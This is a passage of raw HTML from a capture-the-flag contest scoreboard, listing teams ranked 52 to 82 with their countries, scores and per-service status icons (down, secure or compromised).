Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>52</td><td><img width="20px" height="="20px"" src="132.jpg"><b> f0gd0gs </b></td><td>US <img src="us.png"></td><td><b>17.4</b></td><td>506</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>53</td><td><img width="20px" height="="20px"" src="135.jpg"><b> int80 </b></td><td>US <img src="us.png"></td><td><b>11.1</b></td><td>1119</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>54</td><td><img width="20px" height="="20px"" src="173.jpg"><b> Honeypot </b></td><td>RU <img src="ru.png"></td><td><b>11.0</b></td><td>313</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>55</td><td><img width="20px" height="="20px"" src="164.jpg"><b> Team.iCTF.CrySyS.A </b></td><td>HU <img src="hu.png"></td><td><b>9.5</b></td><td>1539</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>56</td><td><img width="20px" height="="20px"" src="204.jpg"><b> GoatLove </b></td><td>US <img src="us.png"></td><td><b>4.5</b></td><td>92</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>57</td><td><img width="20px" height="="20px"" src="162.jpg"><b> The Cavalry </b></td><td>US <img src="us.png"></td><td><b>2.4</b></td><td>71</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>58</td><td><img width="20px" height="="20px"" src="193.jpg"><b> MUM </b></td><td>US <img src="us.png"></td><td><b>1.6</b></td><td>838</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>59</td><td><img width="20px" height="="20px"" src="136.jpg"><b> utdCSG </b></td><td>US <img src="us.png"></td><td><b>1.4</b></td><td>387</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>60</td><td><img width="20px" height="="20px"" src="149.jpg"><b> NorseR@g3 </b></td><td>US <img src="us.png"></td><td><b>0.2</b></td><td>316</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>61</td><td><img width="20px" height="="20px"" src="133.jpg"><b> InKryptz </b></td><td>IN <img src="in.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>62</td><td><img width="20px" height="="20px"" src="137.jpg"><b> A Finite Number of Monkeys </b></td><td>GB <img src="gb.png"></td><td><b>0.0</b></td><td>1435</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>63</td><td><img width="20px" height="="20px"" src="145.jpg"><b> Ulm Security Sparrows </b></td><td>DE <img src="de.png"></td><td><b>0.0</b></td><td>1919</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>64</td><td><img width="20px" height="="20px"" src="148.jpg"><b> Occupy Ring0 </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>649</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>65</td><td><img width="20px" height="="20px"" src="200.jpg"><b> bios </b></td><td>IN <img src="in.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>66</td><td><img width="20px" height="="20px"" src="153.jpg"><b> UCLions </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>172</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>67</td><td><img width="20px" height="="20px"" src="156.jpg"><b> WeAreScientists </b></td><td>AT <img src="at.png"></td><td><b>0.0</b></td><td>1377</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>68</td><td><img width="20px" height="="20px"" src="174.jpg"><b> hack_club </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>69</td><td><img width="20px" height="="20px"" src="188.jpg"><b> XLII </b></td><td>BR <img src="br.png"></td><td><b>0.0</b></td><td>258</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>70</td><td><img width="20px" height="="20px"" src="190.jpg"><b> WCSC </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>190</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>71</td><td><img width="20px" height="="20px"" src="163.jpg"><b> SYNNERS </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>72</td><td><img width="20px" height="="20px"" src="165.jpg"><b> bitmap </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>73</td><td><img width="20px" height="="20px"" src="180.jpg"><b> The Chuck Norrisses </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>74</td><td><img width="20px" height="="20px"" src="167.jpg"><b> Harimeow Malaya </b></td><td>MY <img src="my.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>75</td><td><img width="20px" height="="20px"" src="168.jpg"><b> Sentinel </b></td><td>MY <img src="my.png"></td><td><b>0.0</b></td><td>142</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>76</td><td><img width="20px" height="="20px"" src="169.jpg"><b> ITHasBeenUS </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>77</td><td><img width="20px" height="="20px"" src="171.jpg"><b> LIST </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>733</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>78</td><td><img width="20px" height="="20px"" src="213.jpg"><b> 005-3 </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>79</td><td><img width="20px" height="="20px"" src="210.jpg"><b> shell-storm </b></td><td>FR <img src="fr.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>80</td><td><img width="20px" height="="20px"" src="155.jpg"><b> Phi </b></td><td>SG <img src="sg.png"></td><td><b>0.0</b></td><td>142</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>81</td><td><img width="20px" height="="20px"" src="206.jpg"><b> Lobotomy </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>602</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>82</td><td><img width="20px" height="="20px"" src="209.jpg"><b> PwningYeti </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>248</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" 